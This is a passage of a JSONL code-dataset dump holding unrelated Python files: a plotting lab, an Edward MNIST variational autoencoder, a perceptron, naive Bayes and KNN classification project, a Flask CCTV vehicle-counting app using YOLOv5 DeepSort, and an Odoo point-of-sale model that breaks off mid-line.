show==True:\n\t\tplt.show()\n\treturn\n\nA=[1,2,3,4,5]\nB=[5,6,3,4,8,1,-2]\nC=[0.1, 0.4, 10]\nx=[4,5,6,7,8,9,10]\nplot_data(x, data=[B,C,A],labels=[\"A\", \"B\",\"C\"], title=u'测试', show=True)\n","sub_path":"Lab03.py","file_name":"Lab03.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626647377","text":"\"\"\"\nFrom https://github.com/blei-lab/edward/blob/master/examples/vae.py\n\nVariational auto-encoder for MNIST data.\nReferences\n----------\nhttp://edwardlib.org/tutorials/decoder\nhttp://edwardlib.org/tutorials/inference-networks\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport numpy as np\nimport os\nimport tensorflow as tf\n\nfrom edward.models import Bernoulli, Normal\nfrom edward.util import Progbar\nfrom observations import mnist\nfrom scipy.misc import imsave\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\ndef generator(array, batch_size):\n\t\"\"\"Generate batch with respect to array's first axis.\"\"\"\n\tstart = 0 # pointer to where we are in iteration\n\twhile True:\n\t\tstop = start + batch_size\n\t\tdiff = stop - array.shape[0]\n\t\tif diff <= 0:\n\t\t\tbatch = array[start:stop]\n\t\t\tstart += batch_size\n\t\telse:\n\t\t\tbatch = np.concatenate((array[start:], array[:diff]))\n\t\t\tstart = diff\n\t\tbatch = batch.astype(np.float32) / 255.0 # normalize pizel intensities\n\t\tbatch = np.random.binomial(1, batch) # binarize images\n\t\tyield batch\n\ned.set_seed(42)\n\n# Parameters\nM = 100\nd = 50\nn_epoch = 10\ndata_dir = \"/tmp/data\"\nout_dir = \"/tmp/out\"\n\nif not os.path.exists(out_dir):\n\tos.mkdir(out_dir)\n\n# DATA. MNIST batches are fed at training time.\n(x_train, _), (x_test, y_test) = mnist(data_dir)\nx_train_generator = generator(x_train, M)\n\n# MODEL\n# Define a subgraph of the full model, corresponding to a minibatch of\n# size M.\nz = Normal(loc=tf.zeros([M, d]),\n scale=tf.ones([M, d]))\nhidden = tf.layers.dense(z, 256, activation=tf.nn.relu)\nx = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))\n\n# INFERENCE\n# Define a subgraph of the variational model, corresponding to a\n# minibatch of size M.\nx_ph = tf.placeholder(tf.int32, [M, 28 * 28])\nhidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,\n activation=tf.nn.relu)\nqz = Normal(loc=tf.layers.dense(hidden, d),\n \tscale=tf.layers.dense(\n \thidden, d, activation=tf.nn.softplus))\n\n# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.\ninference = ed.KLqp({z: qz}, data={x: x_ph})\noptimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)\ninference.initialize(optimizer=optimizer)\n\ntf.global_variables_initializer().run()\n\nn_iter_per_epoch = x_train.shape[0] // M\nfor epoch in range(1, n_epoch+1):\n print(\"Epoch: {0}\".format(epoch))\n avg_loss = 0.0\n\n pBar = Progbar(n_iter_per_epoch)\n for t in range(1, n_iter_per_epoch+1):\n \t#print(\"Batch: {0}\".format(t))\n \tpBar.update(t)\n \tx_batch = next(x_train_generator)\n \tinfo_dict = inference.update(feed_dict={x_ph: x_batch})\n \tavg_loss += info_dict['loss']\n\n # Print a lower bound to the average marginal likelihood for an\n # image.\n avg_loss /= n_iter_per_epoch\n avg_loss /= M\n print(\"-log p(x) <= {:0.3f}\".format(avg_loss))\n\n # Prior predictive check.\n images = x.eval()\n for m in range(M):\n \timsave(os.path.join(out_dir, '%d.png') % m, images[m].reshape(28, 28))\n\nsess = ed.get_session()\nlatent = np.array(())\nx_test_generator = generator(x_test, M)\nn_iter_test_set = x_test.shape[0] // M\nfor t in range(1, n_iter_test_set+1):\n\tx_batch = next(x_test_generator)\n\tencoded_mean_test = sess.run(qz.mean(), {x_ph: x_batch})\n\t# Concatenate the evaluated encoded means\n\tif t > 1:\n\t\tlatent = np.concatenate((latent, encoded_mean_test), axis=0)\n\telse:\n\t\tlatent = encoded_mean_test\n\t#print(encoded_mean_test)\n#print(encoded_mean_test.shape)\n#print(latent.shape)\n\n# t-SNE on latent encodings\nembedded = TSNE(n_components=2).fit_transform(latent)\n\n# Plot evaluated encodings for test set\n#if d == 2:\ndf = pd.DataFrame(embedded, columns=('one', 'two'))\ndf['labels'] = y_test \nprint(\"Plot latent encodings.\")\nsns.lmplot('one', 'two', data=df, hue='labels', fit_reg=False, size=8, palette=\"Set1\")\nplt.show()\n\n\n\n\n","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180513220","text":"import time\r\nimport string\r\nimport math\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom collections import defaultdict, Counter\r\nfrom statistics import mean,stdev\r\n\r\ndef load_data(dataset,datatype):\r\n # load digit and face data according to given datatype\r\n # load train and test data according to given dataset\r\n if (datatype=='d'):\r\n if(dataset==\"Train\"):\r\n imagefile= open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/trainingimages\",\"r\")\r\n labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/traininglabels\",'r')\r\n else:\r\n imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/testimages\", \"r\")\r\n labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/testlabels\",'r')\r\n else:\r\n if (dataset == \"Train\"):\r\n imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatrain\", \"r\")\r\n labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatrainlabels\", 'r')\r\n else:\r\n imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatest\", \"r\")\r\n labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatestlabels\", 'r')\r\n lines= imagefile.read().splitlines()\r\n images= []\r\n count = 0\r\n temp = []\r\n if(datatype=='d'):\r\n pixels=28\r\n else:\r\n pixels=70\r\n\r\n for line in lines:\r\n count += 1\r\n temp.append(line)\r\n if(count == pixels):\r\n images.append(temp)\r\n count = 0\r\n temp = []\r\n\r\n lines = labelfile.read().splitlines()\r\n labels = []\r\n for line in lines:\r\n labels.append(int(line))\r\n return images, labels\r\n\r\ndef trainPerceptron(images, labels, trainingSize,datatype,test):\r\n start = time.time()\r\n if (test == \"classification\"):\r\n last = int((float(trainingSize / 100.0)) * len(images))\r\n else:\r\n last = len(images)\r\n\r\n wchange = True\r\n if(datatype=='d'):\r\n weights = []\r\n i = 0\r\n while (i < 10):\r\n tempArray = [0 for count in range(len(images[0]) * len(images[0][0]))]\r\n weights.append(tempArray)\r\n i += 1\r\n biasSet = [0] * 10\r\n else:\r\n weights = [0 for count in range(len(images[0]) * len(images[0][0]))]\r\n biasSet = 0\r\n\r\n while wchange:\r\n wchange = False\r\n for image in images[0:last]:\r\n if(datatype=='d'):\r\n vals = [0.0]*10\r\n j = 0\r\n while (j < 10):\r\n vals[j] = Activationfunction(image, weights[j], biasSet[j])\r\n j += 1\r\n if (vals.index(max(vals)) != labels[images.index(image)]):\r\n # Update weights\r\n weights[vals.index(max(vals))], biasSet[vals.index(max(vals))]=Weightchange(image, weights[vals.index(max(vals))], biasSet[vals.index(max(vals))], -1)\r\n weights[int(labels[images.index(image)])], biasSet[int(labels[images.index(image)])]=Weightchange(image, weights[int(labels[images.index(image)])], biasSet[int(labels[images.index(image)])], 1)\r\n else:\r\n vals = Activationfunction(image, weights, biasSet)\r\n if ((vals >= 0) and (labels[images.index(image)] == 0)):\r\n weights, biasSet = Weightchange(image, weights, biasSet, -1)\r\n wchange = True\r\n elif (vals < 0 and (labels[images.index(image)]) == 1):\r\n weights, biasSet = Weightchange(image, weights, biasSet, 1)\r\n wchange = True\r\n end = time.time()\r\n runtime = end - start\r\n return weights, biasSet, runtime\r\n\r\ndef testPerceptron(images,labels, weights, bias, trainingSize, datatype, runtime):\r\n correct = 0\r\n incorrect = 0\r\n for image in images:\r\n if(datatype=='d'):\r\n vals = [0.0]*10\r\n j = 0\r\n while (j < 10):\r\n vals[j] = Activationfunction(image, weights[j], bias[j])\r\n j += 1\r\n if (vals.index(max(vals)) != labels[images.index(image)]):\r\n incorrect += 1\r\n else:\r\n correct += 1\r\n else:\r\n vals = Activationfunction(image, weights, bias)\r\n if ((vals >= 0 and labels[images.index(image)] == 1) or (vals < 0 and labels[images.index(image)] == 0)):\r\n correct += 1\r\n else:\r\n incorrect += 1\r\n percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n percentIncorrect = float(incorrect / float(correct + incorrect)) * 100\r\n print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n return percentCorrect\r\n\r\ndef trainNaive(images, labels, trainingSize,datatype,test):\r\n start = time.time()\r\n # Amount of training data to be used\r\n if(test==\"classification\"):\r\n last = int((float(trainingSize / 100.0)) * len(images))\r\n else:\r\n last = len(images)\r\n # Calculate priors for digits 0-9\r\n priors=[]\r\n imageTables = []\r\n if(datatype=='d'):\r\n for i in range(0,10):\r\n priors.append(float(labels[0:last].count(i))/float(last))\r\n table = [0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n imageTables.append(table)\r\n\r\n else:\r\n facepriors=float(labels.count(1))/float(len(labels))\r\n Notfacepriors=float(labels.count(0))/float(len(labels))\r\n priors.append(facepriors)\r\n priors.append(Notfacepriors)\r\n table = [0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n imtable=[0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n imageTables.append(table)\r\n imageTables.append(imtable)\r\n\r\n # Construct an array to load image data\r\n # Load data other than empty\r\n for image in images[0:last]:\r\n if(datatype=='d'):\r\n currentimageind = int(labels[images.index(image)])\r\n else:\r\n if(labels[images.index(image)] == 1):\r\n currentimageind=0\r\n else:\r\n currentimageind=1\r\n\r\n k = 0\r\n for i in image:\r\n for j in i:\r\n if (j != ' '):\r\n imageTables[currentimageind][k] += 1.0\r\n k += 1\r\n\r\n for im in range(len(imageTables)):\r\n for jm in range(len(imageTables[im])):\r\n if imageTables[im][jm] > 0.0:\r\n if(datatype=='f'):\r\n if(im==0):\r\n imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(1))\r\n else:\r\n imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(0))\r\n else:\r\n imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(im))\r\n else:\r\n imageTables[im][jm] = 0.0001\r\n end = time.time()\r\n runtime = end - start\r\n return imageTables, priors, runtime\r\n\r\ndef testDigitNaive(images, labels, tables, priors, trainingSize, runtime):\r\n correct = 0\r\n incorrect = 0\r\n for image in images:\r\n pDigits, decimalShifts = DigitProbability(image, tables, priors)\r\n prediction = decimalShifts.index(min(decimalShifts))\r\n sameshift = []\r\n count = 0\r\n #Check if decimalshifts is same for any other digit\r\n for i in range(len(decimalShifts)):\r\n if decimalShifts[i] == decimalShifts[prediction]:\r\n count += 1\r\n sameshift.append(i)\r\n flag = -1\r\n #If the decimal shift is same, then check for prior absolute value\r\n if count > 1:\r\n # Get the max of pDigits out of the indexes in duplicates\r\n tempMax = 0\r\n for j in range(len(pDigits)):\r\n if j in sameshift:\r\n if pDigits[j] > tempMax:\r\n tempMax = pDigits[j]\r\n flag = 1\r\n if (flag == 1):\r\n prediction = tempMax\r\n\r\n if labels[images.index(image)] == prediction:\r\n correct += 1\r\n else:\r\n incorrect += 1\r\n\r\n percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n percentIncorrect = float(incorrect / float(correct + incorrect)) * 100\r\n\r\n print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n return percentCorrect\r\n\r\ndef testFaceNaive(images, labels, FaceTable, NotFaceTable, priorFace, priorNotFace, trainingSize,runtime):\r\n correct = 0\r\n incorrect = 0\r\n for image in images:\r\n pFace, decimalShift1 = ImageProbability(image, FaceTable, priorFace)\r\n pNotFace, decimalShift2 = ImageProbability(image, NotFaceTable, priorNotFace)\r\n difference = decimalShift1 - decimalShift2\r\n\r\n if ((difference == 0 and pFace >= pNotFace) or difference < 0):\r\n if (labels[images.index(image)] == 0):\r\n incorrect += 1\r\n else:\r\n correct += 1\r\n elif ((difference == 0 and pFace < pNotFace) or difference > 0):\r\n if (labels[images.index(image)] == 1):\r\n incorrect += 1\r\n else:\r\n correct += 1\r\n percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n percentIncorrect = float(incorrect / float(correct + incorrect)) * 100\r\n print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n return percentCorrect\r\n\r\ndef DigitProbability(image, tables, priors):\r\n vals = [1] * 10\r\n k = 0\r\n decimalShifts = [0] * 10\r\n for j in image:\r\n for i in j:\r\n for x in range(len(vals)):\r\n if (i != ' '):\r\n vals[x] = vals[x] * tables[x][k]\r\n else:\r\n vals[x] = vals[x] * (1-tables[x][k])\r\n\r\n\r\n if (vals[x] < 0.1):\r\n vals[x] = vals[x] * 10\r\n decimalShifts[x] += 1\r\n k += 1\r\n for n in range(len(vals)):\r\n vals[n] = vals[n] * priors[n]\r\n\r\n return vals, decimalShifts\r\n\r\ndef Weightchange(image, weights, bias, change):\r\n k = 0\r\n if (change > 0): # Increase weights\r\n bias += 1\r\n else:\r\n bias -= 1\r\n for i in image:\r\n for j in i:\r\n if (j != ' '):\r\n if(change>0):\r\n weights[k] += 1\r\n else:\r\n weights[k] -= 1\r\n k += 1\r\n return weights, bias\r\n\r\ndef Activationfunction(image, weights, bias):\r\n fValue = 0\r\n fValue += bias\r\n k = 0;\r\n for i in image:\r\n for j in i:\r\n if (j == ' '):\r\n fValue += 0\r\n else:\r\n fValue += weights[k]\r\n k += 1\r\n return fValue\r\n\r\ndef ImageProbability(image, featureTable, prior):\r\n val = 1\r\n k = 0\r\n decimalShift = 0\r\n for j in image:\r\n for i in j:\r\n if (i != ' '):\r\n val = val * featureTable[k]\r\n else:\r\n val = val * (1-featureTable[k])\r\n k += 1\r\n if (val < 0.1):\r\n val = val * 10\r\n decimalShift += 1\r\n\r\n return (val * prior), decimalShift\r\n\r\ndef euclidean_distance(testimage, trainimage):\r\n return np.sqrt(sum((testimage - trainimage) ** 2))\r\n\r\ndef Getprediction(labels):\r\n occurence_count = Counter(labels)\r\n prediction= occurence_count.most_common(1)[0][0]\r\n return prediction\r\n\r\ndef predict(k, train_images, train_labels, test_image):\r\n # distances contains tuples of (euclidean_distance, label)\r\n # euclidean_distance(test_image, image)\r\n distances = [[euclidean_distance(test_image, image), label] for (image, label) in zip(train_images, train_labels)]\r\n # sort the distances list by distance\r\n distances.sort(key=lambda r: r[0])\r\n # extract only k closest labels\r\n k_labels = [label for (_, label) in distances[:k]]\r\n return Getprediction(k_labels)\r\n\r\ndef testKNN(images,labels,testimages,testlabels,trainingSize):\r\n i = 0\r\n correct = 0\r\n incorrect = 0\r\n start = time.time()\r\n last = int((float(trainingSize / 100.0)) * len(images))\r\n for image in testimages:\r\n pred = predict(6, images[0:last], labels[0:last], image)\r\n if pred == testlabels[i]:\r\n correct += 1\r\n else:\r\n incorrect += 1\r\n i += 1\r\n end = time.time()\r\n runtime = end - start\r\n percentCorrect = float(correct) / float(correct + incorrect) * 100\r\n percentIncorrect = float(incorrect) / float(correct + incorrect) * 100\r\n print(\"Face Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\ndef img_vec(vec):\r\n b = [list(i) for i in vec]\r\n char_to_replace = {' ': 0, '#': 1, '+': 1}\r\n return [char_to_replace.get(n, n) for i in b for n in i]\r\n\r\ndef AccuracyPrediction(Images,Labels,TestImages,TestLabels,size,datatype,test):\r\n last = int((float(size / 100.0)) * len(Images))\r\n randomlist = random.sample(range(0, len(Images)), last)\r\n RandomImages=[]\r\n RandomLabels=[]\r\n for val in randomlist:\r\n RandomImages.append(Images[val])\r\n RandomLabels.append(Labels[val])\r\n\r\n tables,priors,runtime=trainNaive(RandomImages,RandomLabels,size,datatype,test)\r\n if(datatype=='d'):\r\n accuracyNaive= testDigitNaive(TestImages,TestLabels,tables,priors,size,runtime)\r\n else:\r\n accuracyNaive = testFaceNaive(TestImages,TestLabels,tables[0],tables[1],priors[0],priors[1],size,runtime)\r\n\r\n weights, bias, runtime = trainPerceptron(RandomImages, RandomLabels, size, datatype,test)\r\n accuracyPercep= testPerceptron(TestImages, TestLabels, weights, bias, size, datatype, runtime)\r\n\r\n return accuracyNaive, accuracyPercep\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n while True:\r\n datatype= input(\"Enter f for Faces or d for Digits.\\n\").lower()\r\n if (datatype != 'f' and datatype != 'd'):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n while True:\r\n method = input(\"Enter p for Perceptron, n for Naive Bayes, or k for KNN Classifiers.\\n\").lower()\r\n if (method != 'p' and method != 'n' and method != 'k'):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n while True:\r\n size = int(input(\"Enter the percentage of training set images to be used (must be multiple of 10).\\n\")) # Possible 10,20,30,40,50,60,70,80,90,100\r\n if ((size % 10) != 0 or size > 100):\r\n print(\"Improper input Try again.\\n\")\r\n else:\r\n break\r\n\r\n test=\"classification\"\r\n #test = \"accuracy\"\r\n\r\n if(test==\"classification\"):\r\n if (datatype == 'd'):\r\n Image, Labels = load_data(\"Train\", datatype)\r\n TestImage, TestLabel = load_data(\"Test\", datatype)\r\n else:\r\n Image, Labels = load_data(\"Train\", datatype)\r\n TestImage, TestLabel = load_data(\"Test\", datatype)\r\n\r\n if(method==\"n\"):\r\n table, priors, runtime = trainNaive(Image,Labels, size,datatype,test)\r\n if(datatype=='d'):\r\n testDigitNaive(TestImage, TestLabel, table, priors, size, runtime)\r\n else:\r\n testFaceNaive(TestImage,TestLabel,table[0],table[1],priors[0],priors[1],size,runtime)\r\n elif(method==\"p\"):\r\n weights, bias, runtime = trainPerceptron(Image, Labels, size,datatype,test)\r\n testPerceptron(TestImage, TestLabel, weights, bias, size,datatype, runtime)\r\n else:\r\n temp1 = map(img_vec, Image)\r\n k_dImages = list(temp1)\r\n temp2 = map(img_vec, TestImage)\r\n k_dTestImages = list(temp2)\r\n\r\n train_images = np.asarray(k_dImages)\r\n train_labels = np.asarray(Labels)\r\n test_images = np.asarray(k_dTestImages)\r\n test_labels = np.asarray(TestLabel)\r\n\r\n testKNN(train_images,train_labels, test_images,test_labels,size)\r\n else:\r\n digitnacc = []\r\n facenacc = []\r\n digitpacc = []\r\n facepacc = []\r\n dImage, dLabels = load_data(\"Train\", \"d\")\r\n dTestImage, dTestLabel = load_data(\"Test\", \"d\")\r\n fImage, fLabels = load_data(\"Train\", \"f\")\r\n fTestImage, fTestLabel = load_data(\"Test\", \"f\")\r\n\r\n for si in range(10,110,10):\r\n for i in range(5):\r\n dnaive,dpercep=AccuracyPrediction(dImage,dLabels,dTestImage,dTestLabel,si,\"d\",test)\r\n fnaive,fpercep=AccuracyPrediction(fImage, fLabels, fTestImage, fTestLabel, si, \"f\",test)\r\n digitnacc.append(dnaive)\r\n facenacc.append(fnaive)\r\n digitpacc.append(dpercep)\r\n facepacc.append(fpercep)\r\n\r\n print(\"For Digit Classification and Training Set Size: \" + str(si) + \"%\")\r\n print(\"Mean: \" + str(mean(digitnacc)) + \"%\")\r\n print(\"Standard Deviation: \" + str(stdev(digitnacc)) + \"%\")\r\n\r\n print(\"For Face Classification and Training Set Size: \" + str(si) + \"%\")\r\n print(\"Mean: \" + str(mean(facenacc)) + \"%\")\r\n print(\"Standard Deviation: \" + str(stdev(facenacc)) + \"%\")\r\n\r\n print(\"For Digit Classification and Training Set Size: \" + str(si) + \"%\")\r\n print(\"Mean: \" + str(mean(digitpacc)) + \"%\")\r\n print(\"Standard Deviation: \" + str(stdev(digitpacc)) + \"%\")\r\n\r\n print(\"For Face Classification and Training Set Size: \" + str(si) + \"%\")\r\n print(\"Mean: \" + str(mean(facepacc)) + \"%\")\r\n print(\"Standard Deviation: \" + str(stdev(facepacc)) + \"%\")","sub_path":"Classification_Project.py","file_name":"Classification_Project.py","file_ext":"py","file_size_in_byte":18381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350089655","text":"from flask import Flask, render_template, request, url_for, Response, send_file, after_this_request\nfrom flask_cors import CORS\nimport subprocess, requests, os, shutil, time\nfrom datas.location import get_full_loc, get_id\nfrom datas.download import download_vid_file\n\nmodel_dir = 'datas/yolov5x.pt'\napp = Flask(__name__)\nCORS(app)\n\nglobal CONF\nCONF = 0.5\n\ndef count_cnt(url):\n f = open(url, 'r')\n data = f.read()\n car_cnt = set()\n for i in data.split('\\n'):\n line = i.split(' ')\n line = list(map(int, line[:-2]))\n if len(line) == 0:\n break\n car_cnt.add(line[1])\n return len(car_cnt)\n \n\ndef log_subprocess_output(pipe):\n for line in iter(pipe.readline, b''):\n print('S :', str(line)[2:-5])\n\ndef download(url, file_name):\n with open(file_name, \"wb\") as file:\n response = requests.get(url)\n file.write(response.content)\n\ndef make_archive(source, destination):\n archive_from = os.path.dirname(source)\n archive_to = os.path.basename(source.strip(os.sep))\n shutil.make_archive('data', 'zip', archive_from, archive_to)\n shutil.move('%s.%s'%('data', 'zip'), destination)\n\n@app.route('/')\ndef f1():\n loc_list = get_full_loc()\n return render_template('main.html', loc_list=loc_list, enumerate=enumerate, get_id=get_id, CONF=CONF)\n\n@app.route('/download', methods=['GET'])\ndef zip_download():\n try:\n os.remove('static/data.zip')\n except:\n print('Remove Fail')\n make_archive('static/vid', 'static/')\n return send_file('static/data.zip', mimetype='application/zip', attachment_filename='data.zip', as_attachment=True)\n\n@app.route('/setting', methods=['POST'])\ndef setting():\n Conf = float(request.form['CONF'])\n print('CONF value changed!', Conf)\n return Response(status=200)\n\n@app.route('/load_pre', methods=['POST'])\ndef f3():\n id = request.form['id']\n file = download_vid_file(id)\n print('----- CCTV Video Download -----')\n file_list = list(os.listdir('static/vid/processed/'))\n file_len = str(int(len(file_list) / 2) + 1)\n save_url = 'static/vid/cache/%s' % (id + '-' + file_len + '.mp4')\n download(file, save_url)\n print('----- DeepSort Predict -----')\n configs_text = '--output ../static/vid/processed/ --save-vid --save-txt --conf-thres %f --source %s --yolo_weights %s' % (CONF, '../' + (save_url), '../' + model_dir) \n #COCO Datasets \n configs_text += ' --classes 2 3 5 7'\n process = subprocess.Popen(['python', 'track.py'] + configs_text.split(' '), cwd='Yolov5_DeepSort_Pytorch', stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=False)\n with process.stdout:\n log_subprocess_output(process.stdout)\n try:\n car_cnt = count_cnt('static/vid/processed/%s' % (id + '-' + file_len + '.txt'))\n except:\n car_cnt = 0\n\n time.sleep(5)\n return {'res' : url_for('static', filename='vid/processed/%s' % (id + '-' + file_len + '.mp4')), 'cnt':car_cnt}\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=80, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"262168788","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, _\nfrom odoo.exceptions import except_orm\nfrom odoo.tools import float_round\n\n\nclass PosUseServiceLine(models.Model):\n _name = 'pos.use.service.line'\n\n name = fields.Char(\"Name\")\n lot_id = fields.Many2one('stock.production.lot', \"Lot\")\n lot_line_id = fields.Many2one('stock.production.lot.line', \"Lot Line\")\n service_id = fields.Many2one('product.product', \"Service\")\n total_count = fields.Float(\"Total Count\")\n paid_count = fields.Float(\"Paid Count\")\n used_count = fields.Float('Used Count')\n qty = fields.Float(\"Qty\", default=1)\n employee_ids = fields.Many2many('hr.employee', 'employee_pos_use_service_line_rel', 'use_service_line_id', 'emp_id', string='Employees')\n price_unit = fields.Float(\"Price Unit\")\n discount = fields.Float(\"Discount(%)\")\n amount = fields.Float(\"Amount Total\", compute=\"_compute_amount_total\", store=True)\n use_service_id = fields.Many2one('pos.use.service', \"use Service\")\n order_line_id = fields.Many2one('pos.order.line', \"Order Line\")\n revenue_rate = fields.Float(\"Revenue Rate\")\n\n @api.onchange('qty','service_id')\n def _product_qty_change(self):\n if not self.use_service_id.pricelist_id:\n raise except_orm('Cảnh báo!', (\"Vui lòng chọn bảng giá trước khi tạo bản ghi này!\"))\n if not self.service_id:\n return\n product = self.service_id.with_context(\n lang=self.use_service_id.partner_id.lang,\n partner=self.use_service_id.partner_id.id,\n quantity=self.qty,\n date=self.use_service_id.date,\n pricelist=self.use_service_id.pricelist_id.id,\n uom=self.service_id.uom_id.id,\n )\n self.price_unit = product.price\n\n\n @api.onchange('service_id', 'price_unit', 'qty')\n def _onchange_discount(self):\n if not self.use_service_id.pricelist_id:\n raise except_orm('Cảnh báo!', (\"Vui lòng chọn bảng giá trước khi tạo bản ghi này!\"))\n if not (self.service_id and\n self.use_service_id.partner_id and self.use_service_id.pricelist_id and\n self.use_service_id.pricelist_id.discount_policy == 'without_discount'):\n return\n if self.qty < 0:\n raise except_orm('Cảnh báo!', (\"Số lượng phải lớn hơn 0. Vui lòng kiểm tra lại\"))\n if self.use_service_id.type == 'card':\n if self.lot_id.product_id.product_tmpl_id.x_card_type == 'service_card':\n if self.paid_count - self.used_count < self.qty:\n raise except_orm('Cảnh báo!', (\"Bạn không thể sử dụng nhiều hơn số lần còn lại\"))\n if self.lot_id.product_id.product_tmpl_id.x_card_type == 'keep_card':\n if self.used_count + self.qty > self.total_count:\n raise except_orm('Cảnh báo!', (\"Bạn không thể sử dụng nhiều hơn số lần còn lại\"))\n self.discount = 0.0\n product = self.service_id.with_context(\n lang=self.use_service_id.partner_id.lang,\n partner=self.use_service_id.partner_id.id,\n quantity=self.qty,\n date=self.use_service_id.date,\n pricelist=self.use_service_id.pricelist_id.id,\n uom=self.service_id.uom_id.id,\n )\n product_context = dict(self.env.context, partner_id=self.use_service_id.partner_id.id, date=self.use_service_id.date, uom=self.service_id.uom_id.id)\n\n price, rule_id = self.use_service_id.pricelist_id.with_context(product_context).get_product_price_rule(self.service_id, self.qty or 1.0,\n self.use_service_id.partner_id)\n new_list_price, currency = self.with_context(product_context)._get_real_price_currency(product, rule_id, self.qty, self.service_id.uom_id,\n self.use_service_id.pricelist_id.id)\n\n if new_list_price != 0:\n if self.use_service_id.pricelist_id.currency_id != currency:\n # we need new_list_price in the same currency as price, which is in the SO's pricelist's currency\n new_list_price = currency._convert(\n new_list_price, self.use_service_id.pricelist_id.currency_id,\n self.use_service_id.company_id, self.use_service_id.date or fields.Date.today())\n discount = (new_list_price - price) / new_list_price * 100\n if discount > 0:\n discount = float_round(discount, precision_rounding=0.01, rounding_method='HALF-UP')\n self.discount = discount\n\n def _get_real_price_currency(self, product, rule_id, qty, uom, pricelist_id):\n \"\"\"Retrieve the price before applying the pricelist\n :param obj product: object of current product record\n :parem float qty: total quentity of product\n :param tuple price_and_rule: tuple(price, suitable_rule) coming from pricelist computation\n :param obj uom: unit of measure of current order line\n :param integer pricelist_id: pricelist id of sales order\"\"\"\n PricelistItem = self.env['product.pricelist.item']\n field_name = 'lst_price'\n currency_id = None\n product_currency = None\n if rule_id:\n pricelist_item = PricelistItem.browse(rule_id)\n if pricelist_item.pricelist_id.discount_policy == 'without_discount':\n while pricelist_item.base == 'pricelist' and pricelist_item.base_pricelist_id and pricelist_item.base_pricelist_id.discount_policy == 'without_discount':\n price, rule_id = pricelist_item.base_pricelist_id.with_context(uom=uom.id).get_product_price_rule(product, qty,\n self.use_service_id.partner_id)\n pricelist_item = PricelistItem.browse(rule_id)\n\n if pricelist_item.base == 'standard_price':\n field_name = 'standard_price'\n if pricelist_item.base == 'pricelist' and pricelist_item.base_pricelist_id:\n field_name = 'price'\n product = product.with_context(pricelist=pricelist_item.base_pricelist_id.id)\n product_currency = pricelist_item.base_pricelist_id.currency_id\n currency_id = pricelist_item.pricelist_id.currency_id\n\n product_currency = product_currency or (product.company_id and product.company_id.currency_id) or self.use_service_id.company_id.currency_id\n if not currency_id:\n currency_id = product_currency\n cur_factor = 1.0\n else:\n if currency_id.id == product_currency.id:\n cur_factor = 1.0\n else:\n cur_factor = currency_id._get_conversion_rate(product_currency, currency_id, self.use_service_id.company_id, self.use_service_id.date)\n\n return product[field_name] * cur_factor, currency_id\n\n @api.depends('qty', 'price_unit', 'discount')\n def _compute_amount_total(self):\n for line in self:\n if line.use_service_id.type == 'service':\n line.amount = line.qty * line.price_unit * (1 - (line.discount / 100))\n else:\n if 